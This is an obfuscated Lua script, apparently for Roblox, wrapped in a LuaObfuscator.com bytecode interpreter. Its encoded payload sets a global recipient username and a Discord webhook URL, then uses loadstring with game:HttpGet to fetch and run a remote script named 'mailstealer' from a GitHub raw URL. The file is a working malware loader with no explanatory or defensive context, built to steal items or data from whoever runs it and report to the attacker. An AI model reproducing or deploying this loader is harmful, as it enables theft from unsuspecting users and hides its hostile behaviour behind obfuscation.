--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v89=v5(v82,v19);v19=nil;return v89;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=0;local v84;while true do if (v83==(0 -0)) then v84=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-((1497 -(282 + 595)) -(555 + 64))) -(v32-((2569 -(1523 + 114)) -(771 + 86 + 74)))) + ((810 -241) -((1432 -(68 + 997)) + 201)))) ;return v84-(v84%(928 -(214 + 713))) ;end end else local v85=2^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and 1) or ((1270 -(226 + 1044)) + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23()local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(351 -(87 + 263))) then return (v41 * 16777216) + (v40 * (14533 + 51003)) + (v39 * (1213 -(892 + 65))) + v38 ;end if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + ((186 -(67 + 113)) -2) ;v37=(1 + 0) -0 ;end end end local function v24()local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(3 + 0)) then if (v47==0) then if (v46==(0 -0)) then return v48 * (952 -(802 + 150)) ;else local v99=(0 + 0) -0 ;while true do if (v99==(0 -0)) then v47=1 + 0 + 0 ;v45=0;break;end end end elseif (v47==(3044 -(915 + (854 -(201 + 571))))) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/((1138 -(116 + 1022)) -0)))) or (v48 * NaN) ;end return v8(v48,v47-(2210 -(1069 + 118)) ) * (v45 + (v46/((4 -2)^(113 -(253 -192))))) ;end if (v42==(0 + 0)) then v43=v23();v44=v23();v42=1;end if (v42==(3 -(1 + 0))) then v47=v20(v44,21 + 0 ,822 -(368 + 423) );v48=((v20(v44,(365 -265) -68 )==(19 -(10 + 8))) and  -(3 -2)) or ((1573 -1130) -(416 + 26)) ;v42=9 -6 ;end if (v42==1) then v45=1 + 0 ;v46=(v20(v44,1 -0 ,458 -((1004 -(814 + 45)) + (721 -428)) ) * (((24 + 408) -(44 + 386))^32)) + v43 ;v42=1488 -(998 + 488) ;end end end local function v25(v49)local v50=0 + 0 ;local v51;local v52;while true do if (v50==(887 -(261 + 624))) then v52={};for v90=1, #v51 do v52[v90]=v2(v1(v3(v51,v90,v90)));end v50=(13 -9) -1 ;end if (v50==(1080 -(1020 + 60))) then v51=nil;if  not v49 then v49=v23();if (v49==(1423 -(630 + 793))) then return "";end end v50=(1750 -(760 + 987)) -2 ;end if (v50==1) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=(1922 -(1789 + 124)) -7 ;end if (v50==(2 + 1)) then return v6(v52);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (1~=v53) then else v56=nil;v57=nil;v53=2;end if (v53~=4) then else while true do if (v54==(812 -(569 + 242))) then local v96=0 -0 ;while true do if (v96==1) then v54=1 + 1 ;break;end if (v96==0) then v57=nil;v58=nil;v96=1025 -(706 + 318) ;end end end if (v54==0) then local v97=1251 -(721 + 530) ;while true do if (v97==(1272 -(945 + 326))) then v54=2 -1 ;break;end if (v97~=(0 + 0)) then else v55=0;v56=nil;v97=701 -(271 + 429) ;end end end if (v54==3) then v61=nil;while true do local v100=0 + 0 ;local v101;local v102;while true do if (v100==1) then while true do if (v101==(1500 -(1408 + 92))) then v102=1086 -(461 + 625) ;while true do if (v102==0) then local v152=0;while true do if (v152~=0) then else if (v55==2) then local v157=0;local v158;while true do if (v157==0) then v158=1288 -(993 + 295) ;while true do local v164=0;while true do if (v164==0) then if (v158~=1) then else return v59;end if ((0 + 0)==v158) then local v165=0;while true do if (v165==1) then v158=1172 -(418 + 753) ;break;end if ((0 + 0)~=v165) then else for v171=1,v23() do local v172=0;local v173;while true do if (v172~=(0 + 0)) then else v173=v21();if (v20(v173,1,1)==0) then local v182=0;local v183;local v184;local v185;local v186;while true do if (v182==(1 + 0)) then v185=nil;v186=nil;v182=1 + 1 ;end if (v182==0) then v183=0;v184=nil;v182=530 -(406 + 123) ;end if (2==v182) then while true do if (v183~=3) then else if (v20(v185,1772 -(1749 + 20) ,1 + 2 )~=(1323 -(1249 + 73))) then else v186[2 + 2 ]=v61[v186[4]];end v56[v171]=v186;break;end if ((1147 -(466 + 679))==v183) then local v189=0;while true do if (v189==1) then v183=3;break;end if (v189~=(0 -0)) then else if (v20(v185,2 -1 ,1)~=(1901 -(106 + 1794))) then else v186[2]=v61[v186[1 + 1 ]];end if (v20(v185,2,1 + 1 )==(2 -1)) then v186[7 -4 ]=v61[v186[3]];end v189=1;end end end if (v183==1) then local v190=114 -(4 + 110) ;while true do if (v190==(585 -(57 + 527))) then v183=1429 -(41 + 1386) ;break;end if ((103 -(17 + 86))~=v190) then else v186={v22(),v22(),nil,nil};if (v184==0) then local v198=0 -0 ;local v199;local v200;while true do if (v198~=1) then else while true do if (0==v199) then v200=0;while true do if ((0 -0)==v200) then v186[169 -(122 + 44) ]=v22();v186[6 -2 ]=v22();break;end end break;end end break;end if (v198==(0 -0)) then v199=0 + 0 ;v200=nil;v198=1;end end elseif (v184==(1 + 0)) then v186[5 -2 ]=v23();elseif (v184==2) then v186[3]=v23() -((67 -(30 + 35))^(11 + 5)) ;elseif (v184==3) then local v203=1257 -(1043 + 214) ;local v204;while true do if (v203~=(0 -0)) then else v204=1212 -(323 + 889) ;while true do if (v204==0) then v186[3]=v23() -(2^(42 -26)) ;v186[584 -(361 + 219) ]=v22();break;end end break;end end end v190=1;end end end if (v183~=(320 -(53 + 267))) then else local v191=0 + 0 ;while true do if (v191~=(414 -(15 + 398))) then else v183=983 -(18 + 964) ;break;end if (0==v191) then v184=v20(v173,7 -5 ,2 + 1 );v185=v20(v173,3 + 1 ,856 -(20 + 830) );v191=1 + 0 ;end end end end break;end end end break;end end end for v174=127 -(116 + 10) ,v23() do v57[v174-1 ]=v28();end v165=1;end end end break;end end end break;end end end if (1~=v55) then else local v159=0;local v160;local v161;while true do if (v159==1) then while true do if (0~=v160) then else v161=0;while true do if (v161==(1 + 0)) then local v166=738 -(542 + 196) ;while true do if (v166~=1) then else v161=2;break;end if (v166==(0 -0)) then local v169=0;while true do if (v169==0) then for v177=1,v60 do local v178=0;local v179;local v180;local v181;while true do if (v178==(0 + 0)) then v179=0 + 0 ;v180=nil;v178=1 + 0 ;end if (v178==(2 -1)) then v181=nil;while true do if (v179~=(2 -1)) then else if (v180==1) then v181=v21()~=0 ;elseif (v180==(1553 -(1126 + 425))) then v181=v24();elseif (v180==(408 -(118 + 287))) then v181=v25();end v61[v177]=v181;break;end if (v179~=0) then else v180=v21();v181=nil;v179=3 -2 ;end end break;end end end v59[1124 -(118 + 1003) ]=v21();v169=1;end if (v169~=1) then else v166=1;break;end end end end end if (v161~=(5 -3)) then else v55=379 -(142 + 235) ;break;end if (v161==0) then local v167=0;while true do if (v167==(0 -0)) then local v170=0;while true do if (v170==1) then v167=1 + 0 ;break;end if (v170==0) then v60=v23();v61={};v170=1;end end end if (v167==(978 -(553 + 424))) then v161=1 -0 ;break;end end end end break;end end break;end if (v159==0) then v160=0 + 0 ;v161=nil;v159=1;end end end v152=1 + 0 ;end if (v152==1) then v102=1;break;end end end if (v102~=(1 + 0)) then else if ((0 + 0)~=v55) then else local v155=0 + 0 ;local v156;while true do if ((0 -0)~=v155) then else v156=0 -0 ;while true do if (v156==1) then local v162=0;local v163;while true do if (v162==(0 -0)) then v163=0;while true do if (v163==1) then v156=1 + 1 ;break;end if (v163==0) then local v168=0;while true do if ((4 -3)==v168) then v163=1;break;end if (v168==(753 -(239 + 514))) then v58={};v59={v56,v57,nil,v58};v168=1;end end end end break;end end end if (v156==2) then v55=1 + 0 ;break;end if (v156~=0) then else v56={};v57={};v156=2 -1 ;end end break;end end end break;end end break;end end break;end if (v100~=0) then else v101=0;v102=nil;v100=1;end end end break;end if (v54==2) then local v98=0;while true do if (v98==(1203 -(373 + 829))) then v54=734 -(476 + 255) ;break;end if (v98==(1130 -(369 + 761))) then v59=nil;v60=nil;v98=1 + 0 ;end end end end break;end if (v53~=0) then else v54=0;v55=nil;v53=1;end if (v53==(5 -2)) then v60=nil;v61=nil;v53=7 -3 ;end if (2~=v53) then else v58=nil;v59=nil;v53=241 -(64 + 174) ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81>0) then local v103=v80[2];local v104,v105=v71(v78[v103](v13(v78,v103 + 1 ,v80[3])));v73=(v105 + v103) -1 ;local v106=0;for v115=v103,v73 do local v116=0;while true do if (0==v116) then v106=v106 + 1 ;v78[v115]=v104[v106];break;end end end else v78[v80[2]][v80[3]]=v80[4];end elseif (v81<=2) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81>3) then local v118=v80[2];v78[v118]=v78[v118](v13(v78,v118 + 1 ,v73));else v78[v80[2]]=v64[v80[3]];end elseif (v81<=7) then if (v81<=5) then v78[v80[2]][v80[3]]=v80[4];elseif (v81==6) then local v122=v80[2];local v123=v78[v80[3]];v78[v122 + 1 ]=v123;v78[v122]=v123[v80[4]];else v78[v80[2]]();end elseif (v81<=8) then do return;end elseif (v81==9) then local v127=v80[2];local v128,v129=v71(v78[v127](v13(v78,v127 + 1 ,v80[3])));v73=(v129 + v127) -1 ;local v130=0;for v142=v127,v73 do local v143=0;while true do if (v143==0) then v130=v130 + 1 ;v78[v142]=v128[v130];break;end end end else local v131=v80[2];v78[v131]=v78[v131](v13(v78,v131 + 1 ,v73));end elseif (v81<=15) then if (v81<=12) then if (v81>11) then do return;end else v72=v80[3];end elseif (v81<=13) then v72=v80[3];elseif (v81==14) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v78[v80[2]]=v80[3];end elseif (v81<=18) then if (v81<=16) then v78[v80[2]]=v80[3]~=0 ;elseif (v81==17) then v78[v80[2]]=v64[v80[3]];else v78[v80[2]]();end elseif (v81<=19) then v78[v80[2]]=v80[3]~=0 ;elseif (v81==20) then local v137=0;local v138;local v139;while true do if (v137==0) then v138=v80[2];v139=v78[v80[3]];v137=1;end if (v137==1) then v78[v138 + 1 ]=v139;v78[v138]=v139[v80[4]];break;end end else v78[v80[2]]=v80[3];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F73616266726C6D616F2F6D61696C737465616C65722F6D61696E2F6D61696C737465616C65726C756103023O005F4703083O00557365724E616D65030B3O006D6C6B6573612O6461313203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O313O36313438303533323734323136352F78726D7573364A4573703179664F763474674768503276376C486D517553523935336A54326D72466270724B2O36717750326F5A6E6F5A6B466F645F4F703666744F394D00153O00120F3O00013O00260E3O000C0001000200040D3O000C0001001203000100033O001203000200043O00201400020002000500120F000400064O0010000500014O0009000200054O000A00013O00022O000700010001000100040D3O0014000100260E3O00010001000100040D3O00010001001203000100073O00302O000100080009001203000100073O00302O0001000A000B00120F3O00023O00040D3O000100012O00083O00017O00",v9(),...);end
